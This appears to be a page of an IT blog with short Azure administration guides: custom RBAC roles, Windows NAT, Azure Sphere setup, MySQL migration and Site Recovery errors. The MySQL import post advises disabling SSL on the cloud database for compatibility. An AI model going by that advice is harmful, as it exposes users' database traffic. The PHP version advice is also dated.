    W razie czego kod źródłowy dostępny tutaj: https://github.com/rzander/REG2CI/ , Program NirSoft registrychangesview-x64.

Read-Only Access to Policy Definition and Compliance Reports – fast manual

Create a Custom Role definition file e.g.:

notepad $env:TMP\PolicyReader.json

content:

{
“Name”: “Policy Reader”,
“Id”: “0ab0b1a8-8aac-4efd-b8c2-3ee1fb270be8”,
“IsCustom”: true,
“Description”: “Policy Reader.”,
“Actions”: [
“Microsoft.Authorization/policySetDefinitions/read”,
“Microsoft.Authorization/policyDefinitions/read”,
“Microsoft.Authorization/policyAssignments/read”
],
“NotActions”: [

],
“DataActions”: [

],
“NotDataActions”: [

],
“AssignableScopes”: [
“/subscriptions/28c890b5-46e8-44a2-8f59-30e51cadd7f9”
]
}

Using PowerShell:

Connect-AzAccount
Get-AzSubscription
Select-AzSubscription -SubscriptionId x-x-x-x-xxx
New-AzRoleDefinition -InputFile $env:TMP\PolicyReader.json
Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

Unfortunately, you must do it for each subscription.

You can also use Security Reader role that allows you to access to workspaces and support – https://docs.microsoft.com/pl-pl/azure/role-based-access-control/built-in-roles#security-reader.

This is fast outline – to understand what you are doing please visit: https://docs.microsoft.com/en-us/azure/role-based-access-control/tutorial-custom-role-powershell.

 

Nat on Windows 2016+ or on Windows 10 – quick config

Sometimes we need to Enable Internal NAT on Windows Especially when we want to share Internet connection from host to Virtual Machine (using Nested Virtualisation in Azure) or using Windows Containers.

Issue commands:

New-VMSwitch –SwitchName “NAT” –SwitchType Internal
New-NetIPAddress –IPAddress 10.0.0.1 -PrefixLength 24 -InterfaceAlias “vEthernet (NAT)”
New-NetNat –Name NATnetwork –InternalIPInterfaceAddressPrefix 10.0.0.4/24

Custom Roles in Azure – case Azure Kubernetes Service (update)

Azure Role Based Access Control is great! You can assign Roles to users to give specific access and actions. But not always you can find specific Role, in this case I needed to add access to specific users to modify Azure Kubernetes Service, but not delete and create a new one.

In this case, we need to create a Custom Role that can do exactly what you want. You can use this process to create any custom role – just there is a fast step by step:

#Install-Module -Name Az -AllowClobber
#Connect-AzAccount
Get-AzSubscription
Select-AzSubscription -SubscriptionId f31d408c-1e0e-478c-a887-ddb7c7ea78d0
Get-AzProviderOperation “Microsoft.ContainerService/*” | Out-GridView
Get-AzRoleDefinition -Name “Azure Kubernetes Service Cluster Admin Role”
Get-AzRoleDefinition -Name “Azure Kubernetes Service Cluster Admin Role” | ConvertTo-Json
Get-AzRoleDefinition -Name “Azure Kubernetes Service Cluster Admin Role” | ConvertTo-Json | Out-File $env:TMP\AKSResizeCluster.json
notepad $env:TMP\AKSResizeCluster.json
New-AzRoleDefinition -InputFile $env:TMP\AKSResizeCluster.json
Get-AzRoleDefinition | ? {$_.IsCustom -eq $true} | FT Name, IsCustom

Modified AKSResizeCluster.json file (please give new name and add subscription scope at the end):

{
“Name”: “Azure Kubernetes Service Cluster Write Role”,
“Id”: “8783b508-5073-4565-aeeb-9d4a28dd6701”,
“IsCustom”: false,
“Description”: “List cluster admin credential action and Write Privileges”,
“Actions”: [
“Microsoft.ContainerService/containerServices/read”,
“Microsoft.ContainerService/containerServices/write”,
“Microsoft.ContainerService/managedClusters/read”,
“Microsoft.ContainerService/managedClusters/write”,
“Microsoft.ContainerService/operations/read”,
“Microsoft.ContainerService/managedClusters/agentPools/read”,
“Microsoft.ContainerService/managedClusters/write”,
“Microsoft.OperationalInsights/workspaces/sharedkeys/read”,
“Microsoft.OperationalInsights/workspaces/read”,
“Microsoft.OperationsManagement/solutions/write”,
“Microsoft.OperationsManagement/solutions/read”,
“Microsoft.ContainerService/managedClusters/agentPools/write”

],
“NotActions”: [

],
“DataActions”: [

],
“NotDataActions”: [

],
“AssignableScopes”: [
“/subscriptions/!!!Your_Subscription_ID!!!”
]
}

Just after that you have a new Role Azure Kubernetes Service Cluster Write Role and you can assign it in IAM, to your K8S cluster in Azure and you have to add it to Resource Group where your Log Analytics are (eg: 78c-a887-ddb7c7ea78d0-WEULog Analytics workspace).

This is fast outline – to understand what you are doing please visit: https://docs.microsoft.com/en-us/azure/role-based-access-control/tutorial-custom-role-powershell

Azure Sphere – First Step (The device is not responding – An unexpected problem occurred. Please try again; if the issue persists, please refer to aka.ms/azurespheresupport)

To setup Azure Sphere Device you need to create Azure Sphere tenant. To do it you need to create it using this command:

azsphere tenant create -n “spheretenantname”

 

But, you can see:

error: The device is not responding. The device may be unresponsive if it is applying an Azure Sphere operating system update; please retry in a few minutes.

 

 

So first please update your device using:

azsphere device recover

 

After that you can create tenant:

azsphere tenant create -n AZSphereMF

 

If you do again:

azsphere device show-ota-status

you can see an error like this:

error: An unexpected problem occurred. Please try again; if the issue persists, please refer to aka.ms/azurespheresupport for troubleshooting suggestions and support.

 

Please ignore it and you can claim device to the created tenant, by:

azsphere device claim

 

 

Please remember that you can do it only once per device (It is the security model of Azure Sphere).

 

Probably you will want to connect your device to WiFi, so list available networks by:

 

azsphere device wifi scan

 

 

And connect to WiFi:

azsphere device wifi add –ssid My5GNetwork –key secretnetworkkey

 

You can check connection status by issuing:

 

azsphere device wifi show-status

 

 

Now you are ready to deploy your first application to Azure Sphere!

Azure App Service on Linux – mysql and mysqli driver

Azure Web App / Azure App Service on Linux by default do not offer mysql and mysqli driver to connect to MySQL database. The lowest PHP version is 5.6. Sometimes you need to move to the cloud older application.

If your application uses MySQL driver you probably see an error like this:

ErrorException [ Fatal Error ]: Call to undefined function mysql_connect()

So here is an example of how to install the extension to the Azure App Service on Linux, that it is similar to the Windows one. I add MySQL driver to Web App / Azure App Service on Linux, but in a similar way, you can add other extensions.

First, go to Configuration Tab and in configuration settings add PHP_INI_SCAN_DIR where you add files with the configuration of your extensions.

In this example, I added /home/site/ini.

Next, add the directory in your (/home/site/ini) Web App (you can use SSH access or FTP) I suggest to create another directory like /home/site/ext where you put binaries of your extensions.

Finally in /home/site/ini put file .extensions with configuration like:

extension=/home/site/ext/mysql.so

and in /home/site/ext put binary of your extension.

It should look like this:

After putting files please STOP and Start your App Service and extension should be loaded. Please consult your Log Streaming that application is restarted. If you need to compile your own extensions please consult the version of Apache and system in logs, like here:

You can get operating system version by issuing: cat /etc/os-release

Here are examples files that you can use to add mysql driver and mysqli driver:

WebAppMySQLMySQLiExtensions

mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication

When you move MySQL from your hosting to Azure Database for MySQL and trying to connect to it – you can see something like this:

mysql_connect(): mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication. Please use an administration tool to reset your password with the command SET PASSWORD = PASSWORD(‘your_existing_password’). This will store a new, and more secure, hash value in mysql.user. If this user is used in other scripts executed by PHP 5.2 or earlier you might need to remove the old-passwords flag from your my.cnf file

On the internet, you can find some advice about setting a password or add a parameter like:

old_passwords=0

It can help with on-premise installation but, for Azure, the solution is to change PHP version to a higher for an example from 5.3.29 to 5.4.16 what is not a big minor change and application can connect to Azure Database for MySQL.


Kiedy przenosisz bazę MySQL z twojego hostingu do Azure Database for MySQL możesz spotkać się z poniższym błędem:

mysql_connect(): mysqlnd cannot connect to MySQL 4.1+ using the old insecure authentication. Please use an administration tool to reset your password with the command SET PASSWORD = PASSWORD(‘your_existing_password’). This will store a new, and more secure, hash value in mysql.user. If this user is used in other scripts executed by PHP 5.2 or earlier you might need to remove the old-passwords flag from your my.cnf file

W internetach znajdziesz podpowiedzi typu, zmiana hasła lub ustawienie parametru:

old_passwords=0

Powyższe może pomóc w bazach danych utrzymywanych na własnych serwerach, ale w moim przypadku dla Azure nie pomogło. Pomogła natomiast zmiana wersji PHP ze starego PHP 5.3.29 na 5.4.16.

Import Database to Azure Database for MySQL or for MariaDB – real case (Got error 1 from storage engine, you need (at least one of) the SUPER privilege(s) for this operation)

Some time ago Microsoft launched Azure Database for MySQL and Azure Database for MariaDB, so we can use these databases as a Platform as a Service. We are not responsible for the operating system, database engine upgrades, security.

If you need to move your workloads to Azure, on you source server simply run a command like this:

mysqldump –single-transaction -u user_name -p database_name > dump.sql

This simply dump your MariaDB or Mysql database to a dump.sql file. After that, you can create Azure Database for MySQL or Azure Database for MariaDB in Azure and connect to it using GUI tool to manage database – MySQL Workbench (https://dev.mysql.com/downloads/workbench/). To download it just please use other downloads section that will not install local MySQL Database server, but just MySQL Workbench.

Just before installing MySQL Workbench please check if you have installed all prerequisites https://dev.mysql.com/resources/workbench_prerequisites.html.

Just after installing GUI please add new MySQL connection to your newly create Azure Database for MySQL or MariaDB.

Usually, To be compatible with your application you will need to disable SSL connection to your database and you must add Ip address that can connect to your database.

After you will be able to connect to the Azure database you are ready to import Database using Server / Data Import option. You have to create a new Default Target Schema.

If something went wrong you will see an error with the line, but usually, you will not receive so much information about this. So better option to import DB is open dump in New Query editor (File / New Query Tab) and load the dump here .

You can just start import by pressing Run .

If you do not create a database before, please do it using this command:

create database database_name;

use database_name;

Use command use database_name; – at first line of your dump, also.

If there is any error importing you will see it on Output pane:

So you can correct your dump and import again.

Here are my simple corrections:

  • Got error 1 from storage engine

CREATE TABLE `clients_log` ( … ) ENGINE=MyISAM AUTO_INCREMENT=12240 DEFAULT CHARSET=utf8    Error Code: 1030. Got error 1 from storage engine

It is just because MyISAM is not supported in Azure Database for MySQL, primarily due to the lack of transaction support which can potentially lead to data loss. This is one of the reasons MySQL switched over to InnoDB as the default.

So you need to replace all ENGINE=MyISAM with simply space (nothing).

  • Access denied; you need (at least one of) the SUPER privilege(s) for this operation

/*!50001 CREATE ALGORITHM=UNDEFINED */ /*!50013 DEFINER=`xxxx_prod`@`localhost` SQL SECURITY DEFINER */    Error Code: 1227. Access denied; you need (at least one of) the SUPER privilege(s) for this operation

You need to modify DEFINER from DEFINER =` xxxx_prod `@`localhost` to DEFINER =`your_username_just_before@_from_Azure_portal`@`%`

Having DB has several advantages and the most important is Intelligent Performance.

Azure Site recovery – Please provide targetAzureVmName that is supported by Azure

 

Sometimes when we deploy replication in Azure Site Recovery we see this kind of error. The error message seems to be clear – but How to resolve it?

Error ID
70169

Error Message
Enable protection failed as the virtual machine has special characters in its name.

Possible causes
The name ‘KNG-WINDOWS’ contains characters that are not allowed or regarded as reserved words/trademarks by Azure.

Recommendation
Please provide targetAzureVmName that is supported by Azure. If using Powershell, re-run the Enable protection command and use the -TargetName parameter to provide a name for the virtual machine that is supported by Azure. Read more about naming conventions in Azure at https://docs.microsoft.com/en-us/azure/architecture/best-practices/naming-conventions.

Related links
https://docs.microsoft.com/en-us/azure/architecture/best-practices/naming-conventions

How to resolve this error:

  • Go to resource group where your Vault exists and choose Deployments TAB, copy Template JSON – all lines.

  • Go to your vault and go to replicated item that should be in error state and please disable replication.

  • After it please create New Deployment from the template. Just click new and type Template and choose Template deployment.

  • After it please choose to Build your own template in the editor and paste copied template from the point 1 and at almost last line change targetAzureVmName to the supported one.

  • After that click Save and choose the same Resource Group and click Purchase.

Azure Site Recovery – Dynamic Disks or Multiple system disks 1,0 found. Azure doesn’t support multiple system disks

Azure Site Recovery – Dynamic Disks or Multiple system disks 1,0 found. Azure doesn’t support multiple system disks

When we are trying to install Mobility Agent on Windows Server with Raid 1 Operating System Disk we can see this kind of error:

{

“errors”: [

{

“error_name”: “ASRMobilityServiceMultipleBootDisks”,

“error_params”: {

“bootdisk”: “1,0”

},

“default_message”: “Multiple system disks 1,0 found. Azure doesn’t support multiple system disks.”

},

{

“error_name”: “ASRMobilityServiceMultipleSystemDisks”,

“error_params”: {

“systemdisk”: “1,0”

},

“default_message”: “Multiple system disks 1,0 found. Azure doesn’t support multiple system disks.”

}

]

}

The only one solution is to remove Raid 1 – like this:

So simply we need to remove Raid 1.

After that, you will be able to install Azure Site Recovery Mobility Agent. To avoid Multiple OS disk found for the selected VM error like this:

You should disable Raid 1 for C drive and Reserved disk and for me also for Data partition that resided on the same disk.

After establishing replication you can try to add the mirror once again.

Please remember that Azure Site Recovery doesn’t support to replicate Dynamic Disks. So you need to convert these to Basic. You can use for it EaseUs software for it without lost data like here.

After you start replication you can add the disk to Mirror and convert the disk to dynamic and replication will be working.

Step by Step Video.

How to use the Azure Site Recovery Step by Step Course.

 

connect-azaccount – An error occurred while sending the request.

If you are using Powershel – Az module (AzureRM successor) and after command connect-azaccount you see An error occurred while sending the request.

Probably you are not using the latest version. Please check it:

Get-InstalledModule -Name Az.Accounts -AllVersions | Select-Object Name,Version

All Azure-Powershell releases:

https://github.com/Azure/azure-powershell/releases/

«< 6 7 8 9 10 >»
Projekt i wykonanie: Mobiconnect i fast-sms.net   |    Regulamin
Ta strona korzysta z ciasteczek aby świadczyć usługi na najwyższym poziomie. Dalsze korzystanie ze strony oznacza, że zgadzasz się na ich użycie.Zgoda

Added to Cart

Keep Shopping